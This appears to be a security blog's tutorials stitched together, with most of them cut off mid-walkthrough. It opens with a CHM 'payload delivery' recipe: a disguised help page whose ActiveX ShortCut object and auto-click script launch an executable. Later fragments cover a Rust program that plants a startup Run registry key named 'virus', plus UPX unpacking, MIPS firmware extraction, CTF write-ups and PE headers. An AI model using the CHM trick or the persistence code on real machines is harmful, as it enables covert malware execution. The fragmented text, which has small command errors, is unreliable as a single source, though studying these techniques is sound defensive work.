Payload Delivery using CHM file

create the malicious html file help.htm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Microsoft HTML Help Workshop 4.0">
<title>Monitoring help messages</title>
</head>

<body>

<h1>Monitoring help messages
</h1>

<p>You can view help messages to troubleshoot context-sensitive help. Help messages contain the text of each HTML Help API call that is made. Each time you activate context sensitive help in your application, a new message appears including parameters such as the topic ID, text file, and compiled help file that were referenced in the call. These messages can be saved as a text file.
</p>

<h4>What do you want to do?</h4>

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',explorer.exe,C:\Windows\System32\notepad.exe'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>

</body>
</html>

Create the help.hhp file

1
2
3
4
5
6

[OPTIONS]
Compiled file=help.chm

[FILES]
help.htm

Download the Microsoft HTML Help Workshop and Documentation

Put both the file in the same folder

Now run from the directory containing the files "C:\Program Files (x86)\HTML Help Workshop\hhc.exe" hello.hhp

Warning window is pop

onclicking yes we will see that our command got executed.

Download and rename the file from .txt to .exe

What is unpacking

Below is the simple general overview of a original binary and packed binary. As we can see from the diagram below. The entry point starts at the .text section for non-packed binary where as for the packed binary there contains a packing stub or packer code which is the entry point for the packed binary that keeps the original code compressed.

Example: A normal unarchive or unzip folder vs an archive zip folder. In order to see the content or use the content, we need to unzip the content of the file. Similarly for packed binary, in order to see the original code we need to unpacked the zip binary file.

In simple layman terms we can say that unpacking is like unzipping the original data but its only specific to binary executable.

Now that we have a rough idea about what is unpacking lets deep dive into the packed binary

As seen below in PEiD the binary is packed in UPX

we open the binary file in x32dbg and view the memory map we can see the section and loading address such as UPX0, UPX1 etc.

Now if go to the entry point in the CPU section of x32dbg we will see that there is pushad instruction

pushad push all the instruction onto the stacks, visit the document to read more about it. pushad
For the reverse operation the popad is being used so that what ever present in the stack can be clear. Since we know that some instruction is being push onto stack which is the packing instruction, so after the popad the packing instruction will be completed and our binary will be unpacked.

Today we are going learn a simple stack buffer overflow for mips architecture(little endian). We are going to use the DVRF firmware by praetorian.

Requirements:

1. Firmware
2. Binwalk
3. Qemu-user-static
4. Gdb-multiarch with pwndbg
5. Ghidra

Setup

Download the firmware

1
2
3
4
5
6
7
8

┌──(kali㉿kali)-[~]
└─$ mkdir Firmware

┌──(kali㉿kali)-[~]
└─$ cd Firmware/

┌──(kali㉿kali)-[~/Firmware]
└─$ wget https://raw.githubusercontent.com/praetorian-inc/DVRF/refs/heads/master/Firmware/DVRF_v03.bini

Install the Binwalk by referring the link then copy the binary to a /usr/local/bin/binwalk

1
2

┌──(kali㉿kali)-[~/binwalk]
└─$ sudo cp target/release/binwalk /usr/local/bin/binwalk

Install the qemu static by using the following command

1
2

┌──(kali㉿kali)-[~]
└─$ sudo apt install qemu-user-static  

To download the firmware copy the firmware version shown below from the D-Link FTP Server

unzip the file DIR-842_REVC_FIRMWARE_v3.13B05.zip and run binwalk on the extracted file

1
2
3
4
5
6

┌──(kali㉿kali)-[~/DIR842]
└─$ binwalk DIR842C1_FW313WWb05.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------

As we can see that our file firmware DIR842C1_FW313WWb05.bin is encrypted.

Now let’s Unzip the file DIR-842_REVC_FIRMWARE_v3.10B05.zip and extract the filesystem of DIR842C1_FW302b03_middle.bin using binwalk

1
2
3
4
5
6
7
8
9
10
11

┌──(kali㉿kali)-[~/DIR842]                                                                                                                                                                                                        
└─$ sudo binwalk -e --preserve-symlinks --run-as=root DIR842C1_FW302b03_middle.bin
[sudo] password for kali:                                                                                                                                                                                                                  
                                                                                                                                                                                                                                           
DECIMAL       HEXADECIMAL     DESCRIPTION                                                                                                                                                                                                  
--------------------------------------------------------------------------------                                                                                                                                                           
0             0x0             DLOB firmware header, boot partition: "dev=/dev/mtdblock/5"                                                                                                                                                  
112           0x70            uImage header, header size: 64 bytes, header CRC: 0xA33A0532, created: 2018-07-02 07:26:57, image size: 1234680 bytes, Data Address: 0x80060000, Entry Point: 0x80060000, data CRC: 0xE2D6A8D0, OS: Linux, CPU: MIPS, image type: Multi-File Image, compression type: lzma, image name: "MIPS Seattle Linux-3.3.8"                                                                                                                                      
184           0xB8            LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 3641936 bytes                                                                                                     
1245296       0x130070        PackImg section delimiter tag, little endian size: 11572736 bytes; big endian size: 9875456 bytes                                                                                                            
1245328       0x130090        Squashfs filesystem, little endian, version 4.0, compression:xz, size: 9872196 bytes, 2533 inodes, blocksize: 131072 bytes, created: 2018-07-02 07:27:09

Go to extracted file system and identify the architecture by using file command of it’s busybox binary

1
2
3

┌──(kali㉿kali)-[~/DIR842/_DIR842C1_FW302b03_middle.bin.extracted/squashfs-root]
└─$ file bin/busybox 
bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), statically linked, stripped

As we can see that the architecture is mips32 . Let’s try to run the busybox using qemu-mips-static

Today I am going to publish a ctf that I played last year LEVEL 101. Hope someone can learn something from it.

Challenge - bhooth

Clicking the challenge bhooth we are presented with dashboard to launch the instance.

After launching the instance of the challenge, we are presented with an url: screenctf.com:20085 browsing through the challenge, we are presented with a message “Firstly you need to solve me and I will help you out. What you see has everything to answer this problem” which is an html message which means the viewing the source won’t find anything interesting.

Let’s try to intercept the traffic with burpsuite and see if we are able to find anything of our interest. Intercepting the traffic with the burpsuite and looking the response we see that it will assign us a cookie. Set-cookie: abc=Ymhvb3RodW5tYWlu

Taking a look a the cookie we can guess that it’s a base64 encoded string, so let’s try to decode the cookie, Once the cookie has been decoded, we get the string “bhoothunmain”

1
2

$ echo "Ymhvb3RodW5tYWlu" | base64 -d
bhoothunmain

I always hated the formatted strings bugs or never understood it concisely, Therefore I’m writing to explain myself when I took out the challenge of nullcon ctf, baby_formatter.

lets start with analyzing the binary with our file command as we can see that our binary is 64 bit and dynamically linked

1
2

└─$ file baby_formatter 
baby_formatter: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f9112e0876c218b75aa58a45c20ed0308f5da722, for GNU/Linux 3.2.0, not stripped

lets checksec the binary and see what are the mitigations implemented into the binary. Great we can see partial RELRO is present which means the GOT is above the program variables and NX enabled which means out own shellcode can’t be injected into the binary.

1
2
3
4
5
6
7

└─$ pwn checksec baby_formatter
[*] '/home/kali/baby_formatter'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Now lets open our file in ghidra to see what our binary for the interesting functions. When we open our on the left, we can see the symbol table where we have two interesting functions. main and win

When we open the main function in the ghidra decompiler, we can see that we have a local variable local_78 which take value from standard input and print out when the printf function is called. Apart from that we can confirm that the author has implement the proper size check which will not cause the buffer to overflow. And also the program will never return since we have a exit(1) function which is FUN_004010e0(1). what can we do now ?

As we can see that it takes input and return the input to the output with printf as we see in ghidra and prints bye! then exit(1)

You open your mail suddenly you saw a mail from your impersonating friend with a attachment file containing zip. When you unzip the file, you clicked it. Unfortunately the file that you clicked is a malware. And none of Antivirus software signature works.

There are often time comes when we have to write our own signature to kill the malware that is present in the computer.

Here is a small program in rust which will add registry key Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

to the machine. And then print hello wait for 10 minutes and print goodbye.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

use winreg::enums::*;
use winreg::RegKey;
use std::time::Duration;
use std::thread;

fn main() -> Result<(), Box<dyn std::error::Error>> {

    let hklm = RegKey::predef(HKEY_LOCAL_MACHINE);
    let (settings, _) = hklm.create_subkey("Software\\Microsoft\\Windows\\CurrentVersion\\Run")?;

    // Set the program to run at startup
    settings.set_value("virus", &"C:\\Tools\\pestudio\\pestudio\\pestudio.exe")?;

    println!("hello");
    thread::sleep(Duration::from_secs(600));
    println!("goodbye");
    Ok(())
}

The registry Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run will run the program C:\Tools\pestudio\pestudio\pestudio.exe during the startup of the machine.

If we open registry editor we will be able to see the key being added which starts the program during the startup of the machine.

To delete the virus program key so that the virus won’t run during the startup we have to delete the key that is present in the “virus” and the file that points to virus. Below program will delete the key and virus file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

use winreg::enums::*;
use std::fs;
use winreg::RegKey;

fn main() -> Result<(), Box<dyn std::error::Error>> {
    let hklm = RegKey::predef(HKEY_LOCAL_MACHINE);
    let run_key = r"Software\Microsoft\Windows\CurrentVersion\Run";
    let run_key = hklm.open_subkey_with_flags(run_key, KEY_SET_VALUE)?;

    // Delete the program from startup
    run_key.delete_value("virus")?;
    fs::remove_file("C:\\Tools\\pestudio\\pestudio\\pestudio.exe")?;

    Ok(())
}

Introduction

When we load a CD or pendrive in a computer disc drive, the cpu understands what to do irrespective of the operating system i.e windows or linux. Similarly PE file is the executable file which can be loaded in the windows operating system. And the windows operating system knows what to do with PE file i.e “.exe” file.
Have you wonder what lies behind the windows executable file or PE file “.exe” . There often times, we will come across depending on the work like reversing a windows binary, programming a windows binary, analysing malware etc.
The main goal of this article is to understand the PE file structure and what can we do with the underlying structure of the PE file.

Basic PE File Structure

Windows has many flavors (Windows XP, Windows 7, Windows 10) so in order to support for all windows flavors the PE file format was created. To understand the PE format. Lets create a simple PE file PEstructure program in C

1
2
3
4
5
6

#include <stdio.h>
int main(int argc, char **argv[])
{
printf("PE File Structure");
return 0;
}

Build the program in Visual Studio, PE file will be created i.e PEstructure.exe. Open the file in the PE View or CFF explorer. The PE View of PEstructure.exe mapped with the basic PE structure is depicted below.
Fig. PE File StructureLets dive deep into the each component of the PE file format
DOS MZ Header
The first 64 bytes of the PE file is known as DOS MZ Header which is define in winnt.h or windows.inc . The member of DOS MZ header structure is shown below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE header
    WORD   e_magic;                     // Magic number
    WORD   e_cblp;                    // Bytes on last page of file
    WORD   e_cp;                        // Pages in file
    WORD   e_crlc;                      // Relocations
    WORD   e_cparhdr;         // Size of header in paragraphs
    WORD   e_minalloc;        // Minimum extra paragraphs needed
    WORD   e_maxalloc;        // Maximum extra paragraphs needed
    WORD   e_ss;              // Initial (relative) SS value
    WORD   e_sp;                        // Initial SP value
    WORD   e_csum;                      // Checksum
    WORD   e_ip;                        // Initial IP value
    WORD   e_cs;              // Initial (relative) CS value
    WORD   e_lfarlc;          // File address of relocation table
    WORD   e_ovno;                      // Overlay number
    WORD   e_res[4];                    // Reserved words
    WORD   e_oemid;           // OEM identifier (for e_oeminfo)
    WORD   e_oeminfo;         // OEM information; e_oemid specific
    WORD   e_res2[10];                  // Reserved words
    LONG   e_lfanew;          // File address of new exe header
  } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

Out of 19 members of the DOS MZ Header e_magic and e_lfanew is of our significant importance.

e_magic

It is the first member of DOS MZ Header which is also known as magic number. It is a WORD therefore it consist of first 2 bytes “4D 5A” i.e “MZ”. Since Windows is little endian it is stored as “5A 4D” in PE file.
The signature of PE file is “MZ” which stands for “Mark Zbikowski” the man behind the architecture of PE format. It is similar to the signature of other format like pdf → %pdf. This member tell us whether the file is a valid PE file or not.

Binwalk

The operating system deletes system files directory such as /sys /proc /dev. To preserve the sym links when extracting rootfs with binwalk we use

1

binwalk --perserve-symlinks -e <firmware file>

Qemu

Quick static binary emulation

1

qemu-arm-static -L arm-rootfs ./staticbinary